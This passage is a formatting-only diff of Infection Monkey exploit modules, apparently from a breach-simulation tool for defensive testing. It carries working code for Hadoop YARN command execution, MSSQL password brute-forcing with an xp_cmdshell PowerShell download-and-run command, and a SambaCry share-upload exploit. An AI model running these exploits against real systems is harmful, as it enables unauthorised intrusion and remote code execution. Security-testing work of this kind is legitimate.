http_thread.join(self.DOWNLOAD_TIMEOUT) @@ -57,35 +62,47 @@ class HadoopExploiter(WebRCE): def exploit(self, url, command): # Get the newly created application id - resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"), - timeout=LONG_REQUEST_TIMEOUT) + resp = requests.post( + posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT + ) resp = json.loads(resp.content) - app_id = resp['application-id'] + app_id = resp["application-id"] # Create a random name for our application in YARN - rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)]) + rand_name = ID_STRING + "".join( + 
[random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)] + ) payload = self.build_payload(app_id, rand_name, command) - resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT) + resp = requests.post( + posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT + ) return resp.status_code == 202 def check_if_exploitable(self, url): try: - resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"), - timeout=LONG_REQUEST_TIMEOUT) + resp = requests.post( + posixpath.join(url, "ws/v1/cluster/apps/new-application"), + timeout=LONG_REQUEST_TIMEOUT, + ) except requests.ConnectionError: return False return resp.status_code == 200 def build_command(self, path, http_path): # Build command to execute - monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, - vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]) - if 'linux' in self.host.os['type']: + monkey_cmd = build_monkey_commandline( + self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0] + ) + if "linux" in self.host.os["type"]: base_command = HADOOP_LINUX_COMMAND else: base_command = HADOOP_WINDOWS_COMMAND - return base_command % {"monkey_path": path, "http_path": http_path, - "monkey_type": MONKEY_ARG, "parameters": monkey_cmd} + return base_command % { + "monkey_path": path, + "http_path": http_path, + "monkey_type": MONKEY_ARG, + "parameters": monkey_cmd, + } @staticmethod def build_payload(app_id, name, command): @@ -97,6 +114,6 @@ class HadoopExploiter(WebRCE): "command": command, } }, - "application-type": "YARN" + "application-type": "YARN", } return payload diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index c51acc3b8..893ee8ca1 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -8,7 +8,11 @@ import pymssql from common.utils.exceptions import ExploitingVulnerableMachineError, FailedExploitationError from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_monkey_dest_path +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_monkey_dest_path, +) from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload from infection_monkey.model import DROPPER_ARG @@ -17,33 +21,37 @@ LOG = logging.getLogger(__name__) class MSSQLExploiter(HostExploiter): - _EXPLOITED_SERVICE = 'MSSQL' - _TARGET_OS_TYPE = ['windows'] + _EXPLOITED_SERVICE = "MSSQL" + _TARGET_OS_TYPE = ["windows"] EXPLOIT_TYPE = ExploitType.BRUTE_FORCE LOGIN_TIMEOUT = 15 # Time in seconds to wait between MSSQL queries. QUERY_BUFFER = 0.5 - SQL_DEFAULT_TCP_PORT = '1433' + SQL_DEFAULT_TCP_PORT = "1433" # Temporary file that saves commands for monkey's download and execution. 
- TMP_FILE_NAME = 'tmp_monkey.bat' + TMP_FILE_NAME = "tmp_monkey.bat" TMP_DIR_PATH = "%temp%\\tmp_monkey_dir" MAX_XP_CMDSHELL_COMMAND_SIZE = 128 - XP_CMDSHELL_COMMAND_START = "xp_cmdshell \"" - XP_CMDSHELL_COMMAND_END = "\"" + XP_CMDSHELL_COMMAND_START = 'xp_cmdshell "' + XP_CMDSHELL_COMMAND_END = '"' EXPLOIT_COMMAND_PREFIX = ">{payload_file_path}" CREATE_COMMAND_SUFFIX = ">{payload_file_path}" - MONKEY_DOWNLOAD_COMMAND = "powershell (new-object System.Net.WebClient)." \ - "DownloadFile(^\'{http_path}^\' , ^\'{dst_path}^\')" + MONKEY_DOWNLOAD_COMMAND = ( + "powershell (new-object System.Net.WebClient)." + "DownloadFile(^'{http_path}^' , ^'{dst_path}^')" + ) def __init__(self, host): super(MSSQLExploiter, self).__init__(host) self.cursor = None self.monkey_server = None - self.payload_file_path = os.path.join(MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME) + self.payload_file_path = os.path.join( + MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME + ) def _exploit_host(self): """ @@ -52,7 +60,9 @@ class MSSQLExploiter(HostExploiter): """ # Brute force to get connection username_passwords_pairs_list = self._config.get_exploit_user_password_pairs() - self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list) + self.cursor = self.brute_force( + self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list + ) # Create dir for payload self.create_temp_dir() @@ -80,11 +90,15 @@ class MSSQLExploiter(HostExploiter): return self.run_mssql_command(file_running_command) def create_temp_dir(self): - dir_creation_command = MSSQLLimitedSizePayload(command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH)) + dir_creation_command = MSSQLLimitedSizePayload( + command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH) + ) self.run_mssql_command(dir_creation_command) def create_empty_payload_file(self): - suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path) + suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format( + payload_file_path=self.payload_file_path + ) tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix) self.run_mssql_command(tmp_file_creation_command) @@ -111,9 +125,13 @@ class MSSQLExploiter(HostExploiter): def remove_temp_dir(self): # Remove temporary dir we stored payload at - tmp_file_removal_command = MSSQLLimitedSizePayload(command="del {}".format(self.payload_file_path)) + tmp_file_removal_command = MSSQLLimitedSizePayload( + command="del {}".format(self.payload_file_path) + ) self.run_mssql_command(tmp_file_removal_command) - tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH)) + tmp_dir_removal_command = MSSQLLimitedSizePayload( + command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH) + ) self.run_mssql_command(tmp_dir_removal_command) def start_monkey_server(self): @@ -131,25 +149,29 @@ class MSSQLExploiter(HostExploiter): def get_monkey_launch_command(self): dst_path = get_monkey_dest_path(self.monkey_server.http_path) # Form monkey's launch command - monkey_args = build_monkey_commandline(self.host, - get_monkey_depth() - 1, - MSSQLExploiter.SQL_DEFAULT_TCP_PORT, - dst_path) + monkey_args = build_monkey_commandline( + self.host, get_monkey_depth() - 1, MSSQLExploiter.SQL_DEFAULT_TCP_PORT, dst_path + ) suffix = ">>{}".format(self.payload_file_path) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX - return MSSQLLimitedSizePayload(command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args), - 
prefix=prefix, - suffix=suffix) + return MSSQLLimitedSizePayload( + command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args), + prefix=prefix, + suffix=suffix, + ) def get_monkey_download_command(self): dst_path = get_monkey_dest_path(self.monkey_server.http_path) - monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND. \ - format(http_path=self.monkey_server.http_path, dst_path=dst_path) + monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( + http_path=self.monkey_server.http_path, dst_path=dst_path + ) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX - suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path) - return MSSQLLimitedSizePayload(command=monkey_download_command, - suffix=suffix, - prefix=prefix) + suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format( + payload_file_path=self.payload_file_path + ) + return MSSQLLimitedSizePayload( + command=monkey_download_command, suffix=suffix, prefix=prefix + ) def brute_force(self, host, port, users_passwords_pairs_list): """ @@ -170,10 +192,14 @@ class MSSQLExploiter(HostExploiter): try: # Core steps # Trying to connect - conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT) + conn = pymssql.connect( + host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT + ) LOG.info( - 'Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}'.format( - host, user, self._config.hash_sensitive_data(password))) + "Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}".format( + host, user, self._config.hash_sensitive_data(password) + ) + ) self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) self.report_login_attempt(True, user, password) cursor = conn.cursor() @@ -183,14 +209,20 @@ class MSSQLExploiter(HostExploiter): # Combo didn't work, hopping to the next one pass - LOG.warning('No user/password combo was able to connect to host: {0}:{1}, ' - 'aborting brute force'.format(host, port)) - raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr)) + LOG.warning( + "No user/password combo was able to connect to host: {0}:{1}, " + "aborting brute force".format(host, port) + ) + raise FailedExploitationError( + "Bruteforce process failed on host: {0}".format(self.host.ip_addr) + ) class MSSQLLimitedSizePayload(LimitedSizePayload): def __init__(self, command, prefix="", suffix=""): - super(MSSQLLimitedSizePayload, self).__init__(command=command, - max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE, - prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix, - suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END) + super(MSSQLLimitedSizePayload, self).__init__( + command=command, + max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE, + prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix, + suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END, + ) diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py index 797ff6633..b0387105e 100644 --- a/monkey/infection_monkey/exploit/sambacry.py +++ b/monkey/infection_monkey/exploit/sambacry.py @@ -8,24 +8,46 @@ from io import BytesIO import impacket.smbconnection from impacket.nmb import NetBIOSError from impacket.nt_errors import STATUS_SUCCESS -from impacket.smb import (FILE_DIRECTORY_FILE, FILE_NON_DIRECTORY_FILE, FILE_OPEN, FILE_READ_DATA, FILE_SHARE_READ, - FILE_WRITE_DATA, SMB, SMB_DIALECT, SessionError, SMBCommand, SMBNtCreateAndX_Data, - 
SMBNtCreateAndX_Parameters) -from impacket.smb3structs import (SMB2_CREATE, SMB2_FLAGS_DFS_OPERATIONS, SMB2_IL_IMPERSONATION, SMB2_OPLOCK_LEVEL_NONE, - SMB2Create, SMB2Create_Response, SMB2Packet) +from impacket.smb import ( + FILE_DIRECTORY_FILE, + FILE_NON_DIRECTORY_FILE, + FILE_OPEN, + FILE_READ_DATA, + FILE_SHARE_READ, + FILE_WRITE_DATA, + SMB, + SMB_DIALECT, + SessionError, + SMBCommand, + SMBNtCreateAndX_Data, + SMBNtCreateAndX_Parameters, +) +from impacket.smb3structs import ( + SMB2_CREATE, + SMB2_FLAGS_DFS_OPERATIONS, + SMB2_IL_IMPERSONATION, + SMB2_OPLOCK_LEVEL_NONE, + SMB2Create, + SMB2Create_Response, + SMB2Packet, +) from impacket.smbconnection import SMBConnection import infection_monkey.monkeyfs as monkeyfs from common.utils.attack_utils import ScanStatus from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey_by_os +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey_by_os, +) from infection_monkey.model import DROPPER_ARG from infection_monkey.network.smbfinger import SMB_SERVICE from infection_monkey.network.tools import get_interface_to_target from infection_monkey.pyinstaller_utils import get_binary_file_path from infection_monkey.telemetry.attack.t1105_telem import T1105Telem -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" LOG = logging.getLogger(__name__) @@ -36,7 +58,7 @@ class SambaCryExploiter(HostExploiter): https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py """ - _TARGET_OS_TYPE = ['linux'] + _TARGET_OS_TYPE = ["linux"] _EXPLOITED_SERVICE = "Samba" # Name of file which contains the monkey's commandline SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt" @@ -65,8 +87,10 @@ class SambaCryExploiter(HostExploiter): return False writable_shares_creds_dict = self.get_writable_shares_creds_dict(self.host.ip_addr) - LOG.info("Writable shares and their credentials on host %s: %s" % - (self.host.ip_addr, str(writable_shares_creds_dict))) + LOG.info( + "Writable shares and their credentials on host %s: %s" + % (self.host.ip_addr, str(writable_shares_creds_dict)) + ) self.exploit_info["shares"] = {} for share in writable_shares_creds_dict: @@ -79,16 +103,25 @@ class SambaCryExploiter(HostExploiter): successfully_triggered_shares = [] for share in writable_shares_creds_dict: - trigger_result = self.get_trigger_result(self.host.ip_addr, share, writable_shares_creds_dict[share]) + trigger_result = self.get_trigger_result( + self.host.ip_addr, share, writable_shares_creds_dict[share] + ) creds = writable_shares_creds_dict[share] self.report_login_attempt( - trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash']) + trigger_result is not None, + creds["username"], + creds["password"], + creds["lm_hash"], + creds["ntlm_hash"], + ) if trigger_result is not None: successfully_triggered_shares.append((share, trigger_result)) - url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {'username': creds['username'], - 'host': self.host.ip_addr, - 'port': self.SAMBA_PORT, - 'share_name': share} + url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % { + "username": creds["username"], + "host": self.host.ip_addr, + "port": self.SAMBA_PORT, + "share_name": share, + } self.add_vuln_url(url) self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share]) @@ -97,8 +130,9 @@ class 
SambaCryExploiter(HostExploiter): if len(successfully_triggered_shares) > 0: LOG.info( - "Shares triggered successfully on host %s: %s" % ( - self.host.ip_addr, str(successfully_triggered_shares))) + "Shares triggered successfully on host %s: %s" + % (self.host.ip_addr, str(successfully_triggered_shares)) + ) self.add_vuln_port(self.SAMBA_PORT) return True else: @@ -117,8 +151,9 @@ class SambaCryExploiter(HostExploiter): self.trigger_module(smb_client, share) except (impacket.smbconnection.SessionError, SessionError): LOG.debug( - "Exception trying to exploit host: %s, share: %s, with creds: %s." % ( - self.host.ip_addr, share, str(creds))) + "Exception trying to exploit host: %s, share: %s, with creds: %s." + % (self.host.ip_addr, share, str(creds)) + ) def clean_share(self, ip, share, creds): """ @@ -129,9 +164,14 @@ class SambaCryExploiter(HostExploiter): """ smb_client = self.connect_to_server(ip, creds) tree_id = smb_client.connectTree(share) - file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME, - self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64, - self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64] + file_list = [ + self.SAMBACRY_COMMANDLINE_FILENAME, + self.SAMBACRY_RUNNER_RESULT_FILENAME, + self.SAMBACRY_RUNNER_FILENAME_32, + self.SAMBACRY_RUNNER_FILENAME_64, + self.SAMBACRY_MONKEY_FILENAME_32, + self.SAMBACRY_MONKEY_FILENAME_64, + ] for filename in file_list: try: @@ -153,8 +193,9 @@ class SambaCryExploiter(HostExploiter): tree_id = smb_client.connectTree(share) file_content = None try: - file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, - desiredAccess=FILE_READ_DATA) + file_id = smb_client.openFile( + tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA + ) file_content = smb_client.readFile(tree_id, file_id) smb_client.closeFile(tree_id, file_id) except (impacket.smbconnection.SessionError, SessionError): @@ -193,16 +234,18 @@ class SambaCryExploiter(HostExploiter): def get_credentials_list(self): creds = self._config.get_exploit_user_password_or_hash_product() - creds = [{'username': user, 'password': password, 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash} - for user, password, lm_hash, ntlm_hash in creds] + creds = [ + {"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash} + for user, password, lm_hash, ntlm_hash in creds + ] # Add empty credentials for anonymous shares. 
- creds.insert(0, {'username': '', 'password': '', 'lm_hash': '', 'ntlm_hash': ''}) + creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""}) return creds def list_shares(self, smb_client): - shares = [x['shi1_netname'][:-1] for x in smb_client.listShares()] + shares = [x["shi1_netname"][:-1] for x in smb_client.listShares()] return [x for x in shares if x not in self._config.sambacry_shares_not_to_check] def is_vulnerable(self): @@ -214,8 +257,8 @@ class SambaCryExploiter(HostExploiter): LOG.info("Host: %s doesn't have SMB open" % self.host.ip_addr) return False - pattern = re.compile(r'\d*\.\d*\.\d*') - smb_server_name = self.host.services[SMB_SERVICE].get('name') + pattern = re.compile(r"\d*\.\d*\.\d*") + smb_server_name = self.host.services[SMB_SERVICE].get("name") if not smb_server_name: LOG.info("Host: %s refused SMB connection" % self.host.ip_addr) return False @@ -223,27 +266,38 @@ class SambaCryExploiter(HostExploiter): pattern_result = pattern.search(smb_server_name) is_vulnerable = False if pattern_result is not None: - samba_version = smb_server_name[pattern_result.start():pattern_result.end()] - samba_version_parts = samba_version.split('.') + samba_version = smb_server_name[pattern_result.start() : pattern_result.end()] + samba_version_parts = samba_version.split(".") if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"): is_vulnerable = True elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"): is_vulnerable = True - elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and ( - samba_version_parts[1] <= "13"): + elif ( + (samba_version_parts[0] == "4") + and (samba_version_parts[1] == "4") + and (samba_version_parts[1] <= "13") + ): is_vulnerable = True - elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and ( - samba_version_parts[1] <= "9"): + elif ( + (samba_version_parts[0] == "4") + and (samba_version_parts[1] == "5") + and (samba_version_parts[1] <= "9") + ): is_vulnerable = True - elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and ( - samba_version_parts[1] <= "3"): + elif ( + (samba_version_parts[0] == "4") + and (samba_version_parts[1] == "6") + and (samba_version_parts[1] <= "3") + ): is_vulnerable = True else: # If pattern doesn't match we can't tell what version it is. Better try is_vulnerable = True - LOG.info("Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s" % - (self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable))) + LOG.info( + "Host: %s.samba server name: %s. samba version: %s. 
is vulnerable: %s" + % (self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable)) + ) return is_vulnerable @@ -255,27 +309,41 @@ class SambaCryExploiter(HostExploiter): """ tree_id = smb_client.connectTree(share) - with self.get_monkey_commandline_file(self._config.dropper_target_path_linux) as monkey_commandline_file: - smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read) + with self.get_monkey_commandline_file( + self._config.dropper_target_path_linux + ) as monkey_commandline_file: + smb_client.putFile( + share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read + ) with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file: - smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read) + smb_client.putFile( + share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read + ) with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file: - smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read) + smb_client.putFile( + share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read + ) monkey_bin_32_src_path = get_target_monkey_by_os(False, True) monkey_bin_64_src_path = get_target_monkey_by_os(False, False) with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file: - smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read) + smb_client.putFile( + share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read + ) with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file: - smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read) - T1105Telem(ScanStatus.USED, - get_interface_to_target(self.host.ip_addr), - self.host.ip_addr, - monkey_bin_64_src_path).send() + smb_client.putFile( + share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read + ) + T1105Telem( + ScanStatus.USED, + get_interface_to_target(self.host.ip_addr), + self.host.ip_addr, + monkey_bin_64_src_path, + ).send() smb_client.disconnectTree(tree_id) def trigger_module(self, smb_client, share): @@ -305,7 +373,7 @@ class SambaCryExploiter(HostExploiter): self.open_pipe(smb_client, "/" + module_path) except Exception as e: # This is the expected result. We can't tell whether we succeeded or not just by this error code. 
- if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0: + if str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0: return True else: pass @@ -320,7 +388,10 @@ class SambaCryExploiter(HostExploiter): """ sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64] - return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)] + return [ + posixpath.join(*x) + for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names) + ] def get_monkey_runner_bin_file(self, is_32bit): if is_32bit: @@ -329,10 +400,12 @@ class SambaCryExploiter(HostExploiter): return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_64), "rb") def get_monkey_commandline_file(self, location): - return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host, - get_monkey_depth() - 1, - SambaCryExploiter.SAMBA_PORT, - str(location))) + return BytesIO( + DROPPER_ARG + + build_monkey_commandline( + self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location) + ) + ) @staticmethod def is_share_writable(smb_client, share): @@ -342,14 +415,14 @@ class SambaCryExploiter(HostExploiter): :param share: share name :return: True if share is writable, False otherwise. """ - LOG.debug('Checking %s for write access' % share) + LOG.debug("Checking %s for write access" % share) try: tree_id = smb_client.connectTree(share) except (impacket.smbconnection.SessionError, SessionError): return False try: - smb_client.openFile(tree_id, '\\', FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE) + smb_client.openFile(tree_id, "\\", FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE) writable = True except (impacket.smbconnection.SessionError, SessionError): writable = False @@ -369,85 +442,103 @@ class SambaCryExploiter(HostExploiter): """ smb_client = SMBConnection(ip, ip) smb_client.login( - credentials["username"], credentials["password"], '', credentials["lm_hash"], credentials["ntlm_hash"]) + credentials["username"], + credentials["password"], + "", + credentials["lm_hash"], + credentials["ntlm_hash"], + ) return smb_client # Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability # @staticmethod - def create_smb(smb_client, treeId, fileName, desiredAccess, shareMode, creationOptions, creationDisposition, - fileAttributes, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0, - oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None): + def create_smb( + smb_client, + treeId, + fileName, + desiredAccess, + shareMode, + creationOptions, + creationDisposition, + fileAttributes, + impersonationLevel=SMB2_IL_IMPERSONATION, + securityFlags=0, + oplockLevel=SMB2_OPLOCK_LEVEL_NONE, + createContexts=None, + ): packet = smb_client.getSMBServer().SMB_PACKET() - packet['Command'] = SMB2_CREATE - packet['TreeID'] = treeId - if smb_client._SMBConnection._Session['TreeConnectTable'][treeId]['IsDfsShare'] is True: - packet['Flags'] = SMB2_FLAGS_DFS_OPERATIONS + packet["Command"] = SMB2_CREATE + packet["TreeID"] = treeId + if smb_client._SMBConnection._Session["TreeConnectTable"][treeId]["IsDfsShare"] is True: + packet["Flags"] = SMB2_FLAGS_DFS_OPERATIONS smb2Create = SMB2Create() - smb2Create['SecurityFlags'] = 0 - smb2Create['RequestedOplockLevel'] = oplockLevel - smb2Create['ImpersonationLevel'] = impersonationLevel - smb2Create['DesiredAccess'] = desiredAccess - smb2Create['FileAttributes'] = fileAttributes - 
smb2Create['ShareAccess'] = shareMode - smb2Create['CreateDisposition'] = creationDisposition - smb2Create['CreateOptions'] = creationOptions + smb2Create["SecurityFlags"] = 0 + smb2Create["RequestedOplockLevel"] = oplockLevel + smb2Create["ImpersonationLevel"] = impersonationLevel + smb2Create["DesiredAccess"] = desiredAccess + smb2Create["FileAttributes"] = fileAttributes + smb2Create["ShareAccess"] = shareMode + smb2Create["CreateDisposition"] = creationDisposition + smb2Create["CreateOptions"] = creationOptions - smb2Create['NameLength'] = len(fileName) * 2 - if fileName != '': - smb2Create['Buffer'] = fileName.encode('utf-16le') + smb2Create["NameLength"] = len(fileName) * 2 + if fileName != "": + smb2Create["Buffer"] = fileName.encode("utf-16le") else: - smb2Create['Buffer'] = b'\x00' + smb2Create["Buffer"] = b"\x00" if createContexts is not None: - smb2Create['Buffer'] += createContexts - smb2Create['CreateContextsOffset'] = len(SMB2Packet()) + SMB2Create.SIZE + smb2Create['NameLength'] - smb2Create['CreateContextsLength'] = len(createContexts) + smb2Create["Buffer"] += createContexts + smb2Create["CreateContextsOffset"] = ( + len(SMB2Packet()) + SMB2Create.SIZE + smb2Create["NameLength"] + ) + smb2Create["CreateContextsLength"] = len(createContexts) else: - smb2Create['CreateContextsOffset'] = 0 - smb2Create['CreateContextsLength'] = 0 + smb2Create["CreateContextsOffset"] = 0 + smb2Create["CreateContextsLength"] = 0 - packet['Data'] = smb2Create + packet["Data"] = smb2Create packetID = smb_client.getSMBServer().sendSMB(packet) ans = smb_client.getSMBServer().recvSMB(packetID) if ans.isValidAnswer(STATUS_SUCCESS): - createResponse = SMB2Create_Response(ans['Data']) + createResponse = SMB2Create_Response(ans["Data"]) # The client MUST generate a handle for the Open, and it MUST # return success and the generated handle to the calling application. # In our case, str(FileID) - return str(createResponse['FileID']) + return str(createResponse["FileID"]) @staticmethod def open_pipe(smb_client, pathName): # We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style # to make things easier for the caller. 
Not this time ;) - treeId = smb_client.connectTree('IPC$') - LOG.debug('Triggering path: %s' % pathName) + treeId = smb_client.connectTree("IPC$") + LOG.debug("Triggering path: %s" % pathName) if smb_client.getDialect() == SMB_DIALECT: _, flags2 = smb_client.getSMBServer().get_flags() - pathName = pathName.encode('utf-16le') if flags2 & SMB.FLAGS2_UNICODE else pathName + pathName = pathName.encode("utf-16le") if flags2 & SMB.FLAGS2_UNICODE else pathName ntCreate = SMBCommand(SMB.SMB_COM_NT_CREATE_ANDX) - ntCreate['Parameters'] = SMBNtCreateAndX_Parameters() - ntCreate['Data'] = SMBNtCreateAndX_Data(flags=flags2) - ntCreate['Parameters']['FileNameLength'] = len(pathName) - ntCreate['Parameters']['AccessMask'] = FILE_READ_DATA - ntCreate['Parameters']['FileAttributes'] = 0 - ntCreate['Parameters']['ShareAccess'] = FILE_SHARE_READ - ntCreate['Parameters']['Disposition'] = FILE_NON_DIRECTORY_FILE - ntCreate['Parameters']['CreateOptions'] = FILE_OPEN - ntCreate['Parameters']['Impersonation'] = SMB2_IL_IMPERSONATION - ntCreate['Parameters']['SecurityFlags'] = 0 - ntCreate['Parameters']['CreateFlags'] = 0x16 - ntCreate['Data']['FileName'] = pathName + ntCreate["Parameters"] = SMBNtCreateAndX_Parameters() + ntCreate["Data"] = SMBNtCreateAndX_Data(flags=flags2) + ntCreate["Parameters"]["FileNameLength"] = len(pathName) + ntCreate["Parameters"]["AccessMask"] = FILE_READ_DATA + ntCreate["Parameters"]["FileAttributes"] = 0 + ntCreate["Parameters"]["ShareAccess"] = FILE_SHARE_READ + ntCreate["Parameters"]["Disposition"] = FILE_NON_DIRECTORY_FILE + ntCreate["Parameters"]["CreateOptions"] = FILE_OPEN + ntCreate["Parameters"]["Impersonation"] = SMB2_IL_IMPERSONATION + ntCreate["Parameters"]["SecurityFlags"] = 0 + ntCreate["Parameters"]["CreateFlags"] = 0x16 + ntCreate["Data"]["FileName"] = pathName if flags2 & SMB.FLAGS2_UNICODE: - ntCreate['Data']['Pad'] = 0x0 + ntCreate["Data"]["Pad"] = 0x0 return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate) else: @@ -459,4 +550,5 @@ class SambaCryExploiter(HostExploiter): shareMode=FILE_SHARE_READ, creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, - fileAttributes=0) + fileAttributes=0, + ) diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py index 4caa7441f..11932c3f5 100644 --- a/monkey/infection_monkey/exploit/shellshock.py +++ b/monkey/infection_monkey/exploit/shellshock.py @@ -9,51 +9,58 @@ import requests from common.utils.attack_utils import ScanStatus from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.shellshock_resources import CGI_FILES -from 